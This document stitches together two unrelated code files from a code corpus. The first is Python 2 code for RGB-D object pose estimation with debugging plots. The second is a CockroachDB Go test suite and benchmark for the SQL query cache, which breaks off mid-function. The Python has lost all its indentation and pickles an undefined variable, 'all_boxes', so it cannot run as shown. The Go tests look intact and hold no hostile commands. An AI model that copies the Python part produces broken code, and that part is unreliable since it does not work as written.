def backproject_camera(im_depth, meta_data):
depth = im_depth.astype(np.float32, copy=True) / meta_data['factor_depth']
# get intrinsic matrix
K = meta_data['intrinsic_matrix']
K = np.matrix(K)
Kinv = np.linalg.inv(K)
# compute the 3D points
width = depth.shape[1]
height = depth.shape[0]
points = np.zeros((height, width, 3), dtype=np.float32)
# construct the 2D points matrix
x, y = np.meshgrid(np.arange(width), np.arange(height))
ones = np.ones((height, width), dtype=np.float32)
x2d = np.stack((x, y, ones), axis=2).reshape(width*height, 3)
# backprojection
R = Kinv * x2d.transpose()
# compute the norm
N = np.linalg.norm(R, axis=0)
# normalization
R = np.divide(R, np.tile(N, (3,1)))
# compute the 3D points
X = np.multiply(np.tile(depth.reshape(1, width*height), (3, 1)), R)
points[y, x, 0] = X[0,:].reshape(height, width)
points[y, x, 1] = X[1,:].reshape(height, width)
points[y, x, 2] = X[2,:].reshape(height, width)
# mask
index = np.where(im_depth == 0)
points[index[0], index[1], :] = 0
return points
def loss_pose(x, points, cls_label, azimuth_sin_pred, azimuth_cos_pred, elevation_sin_pred):
""" loss function for pose esimation """
rx = x[0]
ry = x[1]
rz = x[2]
C = x[3:6].reshape((3,1))
# construct rotation matrix
Rx = np.matrix([[1, 0, 0], [0, math.cos(rx), -math.sin(rx)], [0, math.sin(rx), math.cos(rx)]])
Ry = np.matrix([[math.cos(ry), 0, math.sin(ry)], [0, 1, 0], [-math.sin(ry), 0, math.cos(ry)]])
Rz = np.matrix([[math.cos(rz), -math.sin(rz), 0], [math.sin(rz), math.cos(rz), 0], [0, 0, 1]])
R = Rz * Ry * Rx
# transform the points
index = np.where(cls_label > 0)
x3d = points[index[0], index[1], :].transpose()
num = x3d.shape[1]
Cmat = np.tile(C, (1, num))
X = R * (x3d - Cmat)
# compute the azimuth and elevation of each 3D point
r = np.linalg.norm(X, axis=0)
elevation_sin = np.sin(np.pi/2 - np.arccos(np.divide(X[2,:], r)))
azimuth_sin = np.sin(np.arctan2(X[1,:], X[0,:]))
azimuth_cos = np.cos(np.arctan2(X[1,:], X[0,:]))
# compute the loss
loss = (np.mean(np.power(azimuth_sin - azimuth_sin_pred[index[0], index[1]], 2)) +
np.mean(np.power(azimuth_cos - azimuth_cos_pred[index[0], index[1]], 2)) +
np.mean(np.power(elevation_sin - elevation_sin_pred[index[0], index[1]], 2))) / 3
return loss
def pose_estimate(im_depth, meta_data, cls_prob, center_pred):
""" estimate the pose of object from network predication """
# compute 3D points in camera coordinate framework
points = backproject_camera(im_depth, meta_data)
# rescale the 3D point map
height = center_pred.shape[2]
width = center_pred.shape[3]
im_depth_rescale = cv2.resize(im_depth, dsize=(height, width), interpolation=cv2.INTER_NEAREST)
points_rescale = cv2.resize(points, dsize=(height, width), interpolation=cv2.INTER_NEAREST)
# find the max cls labels
num_channels = 3
cls_label = np.argmax(cls_prob, axis = 1).reshape((height, width))
x, y = np.meshgrid(np.arange(width), np.arange(height))
azimuth_sin_pred = center_pred[:, num_channels*cls_label+0, y, x].reshape((height, width))
azimuth_cos_pred = center_pred[:, num_channels*cls_label+1, y, x].reshape((height, width))
elevation_sin_pred = center_pred[:, num_channels*cls_label+2, y, x].reshape((height, width))
# optimization
# initialization
x0 = np.zeros((6,1), dtype=np.float32)
index = np.where(im_depth > 0)
x3d = points[index[0], index[1], :]
x0[3:6] = np.mean(x3d, axis=0).reshape((3,1))
xmin = np.min(x3d, axis=0)
xmax = np.max(x3d, axis=0)
factor = 2
bounds = ((-np.pi, np.pi), (-np.pi, np.pi), (-np.pi, np.pi), (factor*xmin[0], factor*xmax[0]), (factor*xmin[1], factor*xmax[1]), (xmin[2], None))
res = minimize(loss_pose, x0, (points_rescale, cls_label, azimuth_sin_pred, azimuth_cos_pred, elevation_sin_pred), method='SLSQP', bounds=bounds, options={'disp': True})
print res.x
# transform the points
rx = res.x[0]
ry = res.x[1]
rz = res.x[2]
C = res.x[3:6].reshape((3,1))
# construct rotation matrix
Rx = np.matrix([[1, 0, 0], [0, math.cos(rx), -math.sin(rx)], [0, math.sin(rx), math.cos(rx)]])
Ry = np.matrix([[math.cos(ry), 0, math.sin(ry)], [0, 1, 0], [-math.sin(ry), 0, math.cos(ry)]])
Rz = np.matrix([[math.cos(rz), -math.sin(rz), 0], [math.sin(rz), math.cos(rz), 0], [0, 0, 1]])
R = Rz * Ry * Rx
# transform the points
index = np.where(im_depth_rescale > 0)
x3d = points_rescale[index[0], index[1], :].transpose()
num = x3d.shape[1]
Cmat = np.tile(C, (1, num))
points_transform = R * (x3d - Cmat)
return points_rescale, np.array(points_transform)
def hough_voting(cls_prob, center_pred):
""" compute the Hough voting space """
num_channels = 5
num_classes = cls_prob.shape[1]
height = center_pred.shape[2]
width = center_pred.shape[3]
x, y = np.meshgrid(np.arange(width), np.arange(height))
# construct the 2D points matrix
x2d = np.stack((x, y), axis=2).reshape(width*height, 2)
# for each class
for i in range(1, num_classes):
vote = np.zeros((width*height, ), dtype=np.float32)
x1 = np.inf * np.ones((width*height, ), dtype=np.float32)
y1 = np.inf * np.ones((width*height, ), dtype=np.float32)
x2 = -np.inf * np.ones((width*height, ), dtype=np.float32)
y2 = -np.inf * np.ones((width*height, ), dtype=np.float32)
vx = center_pred[:, num_channels*i+0, y, x].reshape((height, width))
vy = center_pred[:, num_channels*i+1, y, x].reshape((height, width))
# compute line norms
norms = np.stack((-vy, vx), axis=2).reshape(width*height, 2)
# for each line
for j in range(width*height):
p = x2d[j, :]
n = norms[j, :].transpose()
# compute point to line distance
d = np.absolute( np.dot(x2d - np.tile(p, (width*height, 1)), n)) / np.linalg.norm(n)
index = np.where(d < 1)[0]
vote[index] = vote[index] + 1
ind = np.where(x1[index] > p[0])[0]
x1[index[ind]] = p[0]
ind = np.where(y1[index] > p[1])[0]
y1[index[ind]] = p[1]
ind = np.where(x2[index] < p[0])[0]
x2[index[ind]] = p[0]
ind = np.where(y2[index] < p[1])[0]
y2[index[ind]] = p[1]
import matplotlib.pyplot as plt
fig = plt.figure()
fig.add_subplot(121)
plt.imshow(cls_prob[:,i,:,:].reshape((height, width)))
fig.add_subplot(122)
plt.imshow(vote.reshape((height, width)))
# draw a bounding box
ind = np.argmax(vote)
plt.gca().add_patch(
plt.Rectangle((x1[ind], y1[ind]), x2[ind] - x1[ind],
y2[ind] - y1[ind], fill=False,
edgecolor='r', linewidth=3)
)
plt.show()
def vis_detections(im, im_depth, boxes, scores, cls_prob, center_pred, points_rescale, points_transform):
"""Visual debugging of detections."""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
# show image
ax = fig.add_subplot(331)
im = im[:, :, (2, 1, 0)]
plt.imshow(im)
ax.set_title('input image')
# show depth
ax = fig.add_subplot(332)
plt.imshow(im_depth)
ax.set_title('input depth')
# show class label
height = center_pred.shape[2]
width = center_pred.shape[3]
cls_label = np.argmax(cls_prob, axis = 1).reshape((height, width))
ax = fig.add_subplot(333)
plt.imshow(cls_label)
ax.set_title('class pred')
# show the target
ax = fig.add_subplot(334)
plt.imshow(im)
for i in xrange(boxes.shape[0]):
roi = boxes[i, :4]
plt.gca().add_patch(plt.Rectangle((roi[0], roi[1]), roi[2] - roi[0],
roi[3] - roi[1], fill=False,
edgecolor='r', linewidth=3))
break
# plt.imshow(cls_label)
# ax.set_title('center pred')
num_channels = 3
x, y = np.meshgrid(np.arange(width), np.arange(height))
# vx = center_pred[:, num_channels*cls_label+0, y, x].reshape((height, width))
# vy = center_pred[:, num_channels*cls_label+1, y, x].reshape((height, width))
azimuth_sin = center_pred[:, num_channels*cls_label+0, y, x].reshape((height, width))
azimuth_cos = center_pred[:, num_channels*cls_label+1, y, x].reshape((height, width))
elevation_sin = center_pred[:, num_channels*cls_label+2, y, x].reshape((height, width))
# for x in xrange(vx.shape[1]):
# for y in xrange(vx.shape[0]):
# if vx[y, x] != 0 and vy[y, x] != 0 and cls_label[y, x] != 0:
# plt.gca().annotate("", xy=(x + 2*vx[y, x], y + 2*vy[y, x]), xycoords='data', xytext=(x, y), textcoords='data',
# arrowprops=dict(arrowstyle="->", connectionstyle="arc3"))
# show the azimuth sin image
ax = fig.add_subplot(335)
plt.imshow(azimuth_sin)
ax.set_title('azimuth sin pred')
# show the azimuth cos image
ax = fig.add_subplot(336)
plt.imshow(azimuth_cos)
ax.set_title('azimuth cos pred')
# show the elevation sin image
ax = fig.add_subplot(337)
plt.imshow(elevation_sin)
ax.set_title('elevation sin pred')
# show the 3D points
if points_rescale.shape[0] > 0:
ax = fig.add_subplot(338, projection='3d')
ax.scatter(points_rescale[:,:,0], points_rescale[:,:,1], points_rescale[:,:,2], c='r', marker='o')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.set_aspect('equal')
ax.set_title('input point cloud')
# show the 3D points transform
if points_transform.shape[1] > 0:
ax = fig.add_subplot(339, projection='3d')
ax.scatter(points_transform[0,:], points_transform[1,:], points_transform[2,:], c='r', marker='o')
ax.scatter(0, 0, 0, c='g', marker='o')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.set_aspect('equal')
ax.set_title('transformed point cloud')
plt.show()
def test_net(net, imdb):
output_dir = get_output_dir(imdb, net)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
det_file = os.path.join(output_dir, 'detections.pkl')
print imdb.name
if os.path.exists(det_file):
return
"""Test a Fast R-CNN network on an image database."""
num_images = len(imdb.image_index)
detections = [[] for _ in xrange(num_images)]
# timers
_t = {'im_detect' : Timer(), 'misc' : Timer()}
# perm = np.random.permutation(np.arange(num_images))
for i in xrange(num_images):
# for i in perm:
im = cv2.imread(imdb.image_path_at(i))
im_depth = cv2.imread(imdb.depth_path_at(i), cv2.IMREAD_UNCHANGED)
# shift
# rows = im.shape[0]
# cols = im.shape[1]
# M = np.float32([[1,0,50],[0,1,25]])
# im = cv2.warpAffine(im,M,(cols,rows))
# rescaling
# im = cv2.resize(im, None, None, fx=0.6, fy=0.6, interpolation=cv2.INTER_LINEAR)
_t['im_detect'].tic()
boxes, scores, seg_cls_prob, seg_view_pred = im_detect(net, im, im_depth, imdb.num_classes)
_t['im_detect'].toc()
_t['misc'].tic()
det = {'boxes': boxes, 'scores': scores, 'seg_cls_prob': seg_cls_prob, 'seg_view_pred': seg_view_pred}
detections[i] = det
_t['misc'].toc()
print 'im_detect: {:d}/{:d} {:.3f}s {:.3f}s' \
.format(i + 1, num_images, _t['im_detect'].average_time, _t['misc'].average_time)
# Hough voting
# hough_voting(cls_prob, center_pred)
# read meta data
meta_data_path = imdb.metadata_path_at(i)
# compute object pose
if os.path.exists(meta_data_path):
meta_data = scipy.io.loadmat(meta_data_path)
points_rescale, points_transform = pose_estimate(im_depth, meta_data, seg_cls_prob, seg_view_pred)
else:
points_rescale = np.zeros((0, 0, 3), dtype=np.float32)
points_transform = np.zeros((3, 0), dtype=np.float32)
vis_detections(im, im_depth, boxes, scores, seg_cls_prob, seg_view_pred, points_rescale, points_transform)
det_file = os.path.join(output_dir, 'detections.pkl')
with open(det_file, 'wb') as f:
cPickle.dump(all_boxes, f, cPickle.HIGHEST_PROTOCOL) | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2018 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package sql
import (
"context"
gosql "database/sql"
"fmt"
"reflect"
"testing"
"time"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/kv"
"github.com/cockroachdb/cockroach/pkg/security/username"
"github.com/cockroachdb/cockroach/pkg/sql/clusterunique"
"github.com/cockroachdb/cockroach/pkg/sql/parser"
"github.com/cockroachdb/cockroach/pkg/sql/sem/tree"
"github.com/cockroachdb/cockroach/pkg/testutils"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/randutil"
"github.com/cockroachdb/errors"
"github.com/stretchr/testify/assert"
"golang.org/x/sync/errgroup"
)
type queryCacheTestHelper struct {
srv serverutils.TestServerInterface
godb *gosql.DB
conns []*gosql.Conn
runners []*sqlutils.SQLRunner
hitsDelta, missesDelta int
}
func makeQueryCacheTestHelper(tb testing.TB, numConns int) *queryCacheTestHelper {
h := &queryCacheTestHelper{}
h.srv, h.godb, _ = serverutils.StartServer(tb, base.TestServerArgs{})
h.conns = make([]*gosql.Conn, numConns)
h.runners = make([]*sqlutils.SQLRunner, numConns)
for i := range h.conns {
var err error
h.conns[i], err = h.godb.Conn(context.Background())
if err != nil {
tb.Fatal(err)
}
h.runners[i] = sqlutils.MakeSQLRunner(h.conns[i])
}
r0 := h.runners[0]
r0.Exec(tb, "DROP DATABASE IF EXISTS db1")
r0.Exec(tb, "DROP DATABASE IF EXISTS db2")
r0.Exec(tb, "CREATE DATABASE db1")
r0.Exec(tb, "CREATE TABLE db1.t (a INT, b INT)")
r0.Exec(tb, "INSERT INTO db1.t VALUES (1, 1)")
for _, r := range h.runners {
r.Exec(tb, "SET DATABASE = db1")
}
r0.Exec(tb, "SET CLUSTER SETTING sql.query_cache.enabled = true")
h.ResetStats()
return h
}
func (h *queryCacheTestHelper) Stop() {
h.srv.Stopper().Stop(context.Background())
}
func (h *queryCacheTestHelper) GetStats() (numHits, numMisses int) {
return int(h.srv.MustGetSQLCounter(MetaSQLOptPlanCacheHits.Name)) - h.hitsDelta,
int(h.srv.MustGetSQLCounter(MetaSQLOptPlanCacheMisses.Name)) - h.missesDelta
}
func (h *queryCacheTestHelper) ResetStats() {
hits, misses := h.GetStats()
h.hitsDelta += hits
h.missesDelta += misses
}
func (h *queryCacheTestHelper) AssertStats(tb *testing.T, expHits, expMisses int) {
tb.Helper()
hits, misses := h.GetStats()
assert.Equal(tb, expHits, hits, "hits")
assert.Equal(tb, expMisses, misses, "misses")
}
// CheckStats is similar to AssertStats, but returns an error instead of
// failing the test if the actual stats don't match the expected stats.
func (h *queryCacheTestHelper) CheckStats(tb *testing.T, expHits, expMisses int) error {
tb.Helper()
hits, misses := h.GetStats()
if expHits != hits {
return errors.Errorf("expected %d hits but found %d", expHits, hits)
}
if expMisses != misses {
return errors.Errorf("expected %d misses but found %d", expMisses, misses)
}
return nil
}
func TestQueryCache(t *testing.T) {
defer leaktest.AfterTest(t)()
defer log.Scope(t).Close(t)
t.Run("simple", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
// Alternate between the connections.
for i := 0; i < 5; i++ {
for _, r := range h.runners {
r.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
}
}
// We should have 1 miss and the rest hits.
h.AssertStats(t, 5*numConns-1, 1)
})
t.Run("simple-prepare", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
// Alternate between the connections.
for i := 0; i < 5; i++ {
for _, r := range h.runners {
r.Exec(t, fmt.Sprintf("PREPARE a%d AS SELECT * FROM t", i))
}
}
// We should have 1 miss and the rest hits.
h.AssertStats(t, 5*numConns-1, 1)
for i := 0; i < 5; i++ {
for _, r := range h.runners {
r.CheckQueryResults(
t,
fmt.Sprintf("EXECUTE a%d", i),
[][]string{{"1", "1"}},
)
}
}
})
t.Run("simple-prepare-with-args", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
// Alternate between the connections.
for i := 0; i < 5; i++ {
for _, r := range h.runners {
r.Exec(t, fmt.Sprintf("PREPARE a%d AS SELECT a + $1, b + $2 FROM t", i))
}
}
// We should have 1 miss and the rest hits.
h.AssertStats(t, 5*numConns-1, 1)
for i := 0; i < 5; i++ {
for _, r := range h.runners {
r.CheckQueryResults(
t,
fmt.Sprintf("EXECUTE a%d (10, 100)", i),
[][]string{{"11", "101"}},
)
r.CheckQueryResults(
t,
fmt.Sprintf("EXECUTE a%d (20, 200)", i),
[][]string{{"21", "201"}},
)
}
}
})
// Verify that using a relative timestamp literal interacts correctly with
// the query cache (#48717).
t.Run("relative-timestamp", func(t *testing.T) {
h := makeQueryCacheTestHelper(t, 1 /* numConns */)
defer h.Stop()
r := h.runners[0]
res := r.QueryStr(t, "SELECT 'now'::TIMESTAMP")
time.Sleep(time.Millisecond)
res2 := r.QueryStr(t, "SELECT 'now'::TIMESTAMP")
if reflect.DeepEqual(res, res2) {
t.Error("expected different result")
}
})
t.Run("parallel", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
var group errgroup.Group
for connIdx := range h.conns {
c := h.conns[connIdx]
group.Go(func() error {
for j := 0; j < 10; j++ {
rows, err := c.QueryContext(context.Background(), "SELECT * FROM t")
if err != nil {
return err
}
res, err := sqlutils.RowsToStrMatrix(rows)
if err != nil {
return err
}
if !reflect.DeepEqual(res, [][]string{{"1", "1"}}) {
return errors.Errorf("incorrect results %v", res)
}
}
return nil
})
}
if err := group.Wait(); err != nil {
t.Fatal(err)
}
})
t.Run("parallel-prepare", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
var group errgroup.Group
for connIdx := range h.conns {
c := h.conns[connIdx]
group.Go(func() error {
ctx := context.Background()
for j := 0; j < 10; j++ {
// Query with a multi-use CTE (as a regression test for #44867). The
// left join condition never passes so this is really equivalent to:
// SELECT a+$1,b+$2 FROM t
query := fmt.Sprintf(`PREPARE a%d AS
WITH cte(x,y) AS (SELECT a+$1, b+$2 FROM t)
SELECT cte.x, cte.y FROM cte LEFT JOIN cte as cte2 on cte.y = cte2.x`, j)
if _, err := c.ExecContext(ctx, query); err != nil {
return err
}
rows, err := c.QueryContext(ctx, fmt.Sprintf("EXECUTE a%d (10, 100)", j))
if err != nil {
return err
}
res, err := sqlutils.RowsToStrMatrix(rows)
if err != nil {
return err
}
if !reflect.DeepEqual(res, [][]string{{"11", "101"}}) {
return errors.Errorf("incorrect results %v", res)
}
}
return nil
})
}
if err := group.Wait(); err != nil {
t.Fatal(err)
}
})
// Test connections running the same statement but under different databases.
t.Run("multidb", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
r0 := h.runners[0]
r0.Exec(t, "CREATE DATABASE db2")
r0.Exec(t, "CREATE TABLE db2.t (a INT)")
r0.Exec(t, "INSERT INTO db2.t VALUES (2)")
for i := range h.runners {
if i%2 == 1 {
h.runners[i].Exec(t, "SET DATABASE = db2")
}
}
// Alternate between the connections.
for i := 0; i < 5; i++ {
for j, r := range h.runners {
var res [][]string
if j%2 == 0 {
res = [][]string{{"1", "1"}}
} else {
res = [][]string{{"2"}}
}
r.CheckQueryResults(t, "SELECT * FROM t", res)
}
}
})
t.Run("multidb-prepare", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
r0 := h.runners[0]
r0.Exec(t, "CREATE DATABASE db2")
r0.Exec(t, "CREATE TABLE db2.t (a INT)")
r0.Exec(t, "INSERT INTO db2.t VALUES (2)")
for i := range h.runners {
if i%2 == 1 {
h.runners[i].Exec(t, "SET DATABASE = db2")
}
}
// Alternate between the connections.
for i := 0; i < 5; i++ {
for j, r := range h.runners {
r.Exec(t, fmt.Sprintf("PREPARE a%d AS SELECT a + $1 FROM t", i))
var res [][]string
if j%2 == 0 {
res = [][]string{{"11"}}
} else {
res = [][]string{{"12"}}
}
r.CheckQueryResults(t, fmt.Sprintf("EXECUTE a%d (10)", i), res)
}
}
})
// Test that a schema change triggers cache invalidation.
t.Run("schemachange", func(t *testing.T) {
h := makeQueryCacheTestHelper(t, 2 /* numConns */)
defer h.Stop()
r0, r1 := h.runners[0], h.runners[1]
r0.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
h.AssertStats(t, 0 /* hits */, 1 /* misses */)
r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
h.AssertStats(t, 1 /* hits */, 1 /* misses */)
r0.Exec(t, "ALTER TABLE t ADD COLUMN c INT AS (a+b) STORED")
h.AssertStats(t, 1 /* hits */, 1 /* misses */)
r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1", "2"}})
h.AssertStats(t, 1 /* hits */, 2 /* misses */)
})
// Test that creating new statistics triggers cache invalidation.
t.Run("statschange", func(t *testing.T) {
h := makeQueryCacheTestHelper(t, 2 /* numConns */)
defer h.Stop()
r0, r1 := h.runners[0], h.runners[1]
r0.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
h.AssertStats(t, 0 /* hits */, 1 /* misses */)
r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
h.AssertStats(t, 1 /* hits */, 1 /* misses */)
r0.Exec(t, "CREATE STATISTICS s FROM t")
h.AssertStats(t, 1 /* hits */, 1 /* misses */)
hits := 1
testutils.SucceedsSoon(t, func() error {
// The stats cache is updated asynchronously, so we may get some hits
// before we get a miss.
r1.CheckQueryResults(t, "SELECT * FROM t", [][]string{{"1", "1"}})
if err := h.CheckStats(t, hits, 2 /* misses */); err != nil {
hits++
return err
}
return nil
})
})
// Test that a schema change triggers cache invalidation.
t.Run("schemachange-prepare", func(t *testing.T) {
h := makeQueryCacheTestHelper(t, 2 /* numConns */)
defer h.Stop()
r0, r1 := h.runners[0], h.runners[1]
r0.Exec(t, "PREPARE a AS SELECT * FROM t")
r0.CheckQueryResults(t, "EXECUTE a", [][]string{{"1", "1"}})
r0.CheckQueryResults(t, "EXECUTE a", [][]string{{"1", "1"}})
r0.Exec(t, "ALTER TABLE t ADD COLUMN c INT AS (a+b) STORED")
r1.Exec(t, "PREPARE b AS SELECT * FROM t")
r1.CheckQueryResults(t, "EXECUTE b", [][]string{{"1", "1", "2"}})
})
// Test a schema change where the other connections are running the query in
// parallel.
t.Run("schemachange-parallel", func(t *testing.T) {
const numConns = 4
h := makeQueryCacheTestHelper(t, numConns)
defer h.Stop()
var group errgroup.Group
for connIdx := 1; connIdx < numConns; connIdx++ {
c := h.conns[connIdx]
connIdx := connIdx
group.Go(func() error {
sawChanged := false
prepIdx := 0
doQuery := func() error {
// Some threads do prepare, others execute directly.
var rows *gosql.Rows
var err error
ctx := context.Background()
if connIdx%2 == 1 {
rows, err = c.QueryContext(ctx, "SELECT * FROM t")
} else {
prepIdx++
_, err = c.ExecContext(ctx, fmt.Sprintf("PREPARE a%d AS SELECT * FROM t", prepIdx))
if err == nil {
rows, err = c.QueryContext(ctx, fmt.Sprintf("EXECUTE a%d", prepIdx))
if err != nil {
// If the schema change happens in-between the PREPARE and
// EXECUTE, we will get an error. Tolerate this error if we
// haven't seen updated results already.
if !sawChanged && testutils.IsError(err, "cached plan must not change result type") {
t.Logf("thread %d hit race", connIdx)
return nil
}
}
}
}
if err != nil {
return err
}
res, err := sqlutils.RowsToStrMatrix(rows)
if err != nil {
return err
}
if reflect.DeepEqual(res, [][]string{{"1", "1"}}) {
if sawChanged {
return errors.Errorf("Saw updated results, then older results")
}
} else if reflect.DeepEqual(res, [][]string{{"1", "1", "2"}}) {
sawChanged = true
} else {
return errors.Errorf("incorrect results %v", res)
}
return nil
}
// Run the query until we see an updated result.
for !sawChanged {
if err := doQuery(); err != nil {
return err
}
}
t.Logf("thread %d saw changed results", connIdx)
// Now run the query a bunch more times to make sure we keep reading the
// updated version.
for i := 0; i < 10; i++ {
if err := doQuery(); err != nil {
return err
}
}
return nil
})
}
r0 := h.runners[0]
r0.Exec(t, "ALTER TABLE t ADD COLUMN c INT AS (a+b) STORED")
if err := group.Wait(); err != nil {
t.Fatal(err)
}
})
// Verify the case where a PREPARE encounters a query cache entry that was
// created by a direct execution (and hence has no Metadata).
t.Run("exec-and-prepare", func(t *testing.T) {
h := makeQueryCacheTestHelper(t, 1 /* numConns */)
defer h.Stop()
r0 := h.runners[0]
r0.Exec(t, "SELECT * FROM t") // Should miss the cache.
h.AssertStats(t, 0 /* hits */, 1 /* misses */)
r0.Exec(t, "SELECT * FROM t") // Should hit the cache.
h.AssertStats(t, 1 /* hits */, 1 /* misses */)
r0.Exec(t, "PREPARE x AS SELECT * FROM t") // Should miss the cache.
h.AssertStats(t, 1 /* hits */, 2 /* misses */)
r0.Exec(t, "PREPARE y AS SELECT * FROM t") // Should hit the cache.
h.AssertStats(t, 2 /* hits */, 2 /* misses */)
r0.CheckQueryResults(t, "EXECUTE x", [][]string{{"1", "1"}})
r0.CheckQueryResults(t, "EXECUTE y", [][]string{{"1", "1"}})
})
// Verify the case where we PREPARE the same statement with different hints.
t.Run("prepare-hints", func(t *testing.T) {
h := makeQueryCacheTestHelper(t, 1 /* numConns */)
defer h.Stop()
r0 := h.runners[0]
r0.Exec(t, "PREPARE a1 AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
h.AssertStats(t, 0 /* hits */, 1 /* misses */)
r0.Exec(t, "PREPARE a2 AS SELECT pg_typeof(1 + $1)") // Should hit the cache.
h.AssertStats(t, 1 /* hits */, 1 /* misses */)
r0.Exec(t, "PREPARE b1 (float) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
h.AssertStats(t, 1 /* hits */, 2 /* misses */)
r0.Exec(t, "PREPARE b2 (float) AS SELECT pg_typeof(1 + $1)") // Should hit the cache.
h.AssertStats(t, 2 /* hits */, 2 /* misses */)
r0.Exec(t, "PREPARE c1 (decimal) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
h.AssertStats(t, 2 /* hits */, 3 /* misses */)
r0.Exec(t, "PREPARE c2 (decimal) AS SELECT pg_typeof(1 + $1)") // Should hit the cache.
h.AssertStats(t, 3 /* hits */, 3 /* misses */)
r0.Exec(t, "PREPARE a3 AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
h.AssertStats(t, 3 /* hits */, 4 /* misses */)
r0.Exec(t, "PREPARE b3 (float) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
h.AssertStats(t, 3 /* hits */, 5 /* misses */)
r0.Exec(t, "PREPARE c3 (decimal) AS SELECT pg_typeof(1 + $1)") // Should miss the cache.
h.AssertStats(t, 3 /* hits */, 6 /* misses */)
r0.CheckQueryResults(t, "EXECUTE a1 (1)", [][]string{{"bigint"}})
r0.CheckQueryResults(t, "EXECUTE a2 (1)", [][]string{{"bigint"}})
r0.CheckQueryResults(t, "EXECUTE a3 (1)", [][]string{{"bigint"}})
r0.CheckQueryResults(t, "EXECUTE b1 (1)", [][]string{{"double precision"}})
r0.CheckQueryResults(t, "EXECUTE b2 (1)", [][]string{{"double precision"}})
r0.CheckQueryResults(t, "EXECUTE b3 (1)", [][]string{{"double precision"}})
r0.CheckQueryResults(t, "EXECUTE c1 (1)", [][]string{{"numeric"}})
r0.CheckQueryResults(t, "EXECUTE c2 (1)", [][]string{{"numeric"}})
r0.CheckQueryResults(t, "EXECUTE c3 (1)", [][]string{{"numeric"}})
})
}
// BenchmarkQueryCache is a set of benchmarks that run queries against a server
// with the query cache on and off, with varying number of parallel clients and
// with workloads that are either cacheable or not.
//
// For microbenchmarks of the query cache data structures, see the sql/querycache
// package.
func BenchmarkQueryCache(b *testing.B) {
defer leaktest.AfterTest(b)()
defer log.Scope(b).Close(b)
workloads := []string{"small", "large"}
methods := []string{"simple", "prepare-once", "prepare-each"}
run := func(
b *testing.B,
numClients int,
workloadIdx int,
methodIdx int,
cacheOn bool,
) {
h := makeQueryCacheTestHelper(b, numClients)
defer h.Stop()
r0 := h.runners[0]
r0.Exec(b, "CREATE TABLE kv (k INT PRIMARY KEY, v INT)")
r0.Exec(b, fmt.Sprintf("SET CLUSTER SETTING sql.query_cache.enabled = %t", cacheOn))
var group errgroup.Group
b.ResetTimer()
for connIdx := 0; connIdx < numClients; connIdx++ {
c := h.conns[connIdx]
group.Go(func() error {
rng, _ := randutil.NewTestRand()
ctx := context.Background()
// We use a small or large range of values depending on the
// workload type.
valRange := 0
switch workloadIdx {
case 0: // small
valRange = 100
case 1: // large
valRange = 10000000
}
var stmt *gosql.Stmt
if methodIdx == 1 {
var err error
stmt, err = c.PrepareContext(ctx, "SELECT v FROM kv WHERE k=$1")
if err != nil {
return err
}
}
for i := 0; i < b.N/numClients; i++ {
val := rng.Intn(valRange)
var err error
switch methodIdx {
case 0: // simple
query := fmt.Sprintf("SELECT v FROM kv WHERE k=%d", val)
_, err = c.ExecContext(ctx, query)
case 1: // prepare-once
_, err = stmt.ExecContext(ctx, val)
case 2: // prepare-every-time
_, err = c.ExecContext(ctx, "SELECT v FROM kv WHERE k=$1", val)
}
if err != nil {
return err
}
}
return nil
})
if err := group.Wait(); err != nil {
b.Fatal(err)
}
}
b.StopTimer()
}
for workload, workloadName := range workloads {
b.Run(workloadName, func(b *testing.B) {
for _, clients := range []int{1, 4, 8} {
b.Run(fmt.Sprintf("clients-%d", clients), func(b *testing.B) {
for method, methodName := range methods {
b.Run(methodName, func(b *testing.B) {
for _, cache := range []bool{false, true} {
name := "cache-off"
if cache {
name = "cache-on"
}
b.Run(name, func(b *testing.B) {
run(b, clients, workload, method, cache)
})
}
})
}
})
}
})
}
}
func TestPlanGistControl(t *testing.T) {
defer leaktest.AfterTest(t)()
defer log.Scope(t).Close(t)
ctx := context.Background()
s, _, db := serverutils.StartServer(t, base.TestServerArgs{})
defer s.Stopper().Stop(ctx)
execCfg := s.ExecutorConfig().(ExecutorConfig)
sd := NewInternalSessionData(ctx, execCfg.Settings, "test")
internalPlanner, cleanup := NewInternalPlanner(
"test",
kv.NewTxn(ctx, db, s.NodeID()),
username.NodeUserName(),
&MemoryMetrics{},
&execCfg,
sd,
)
defer cleanup()
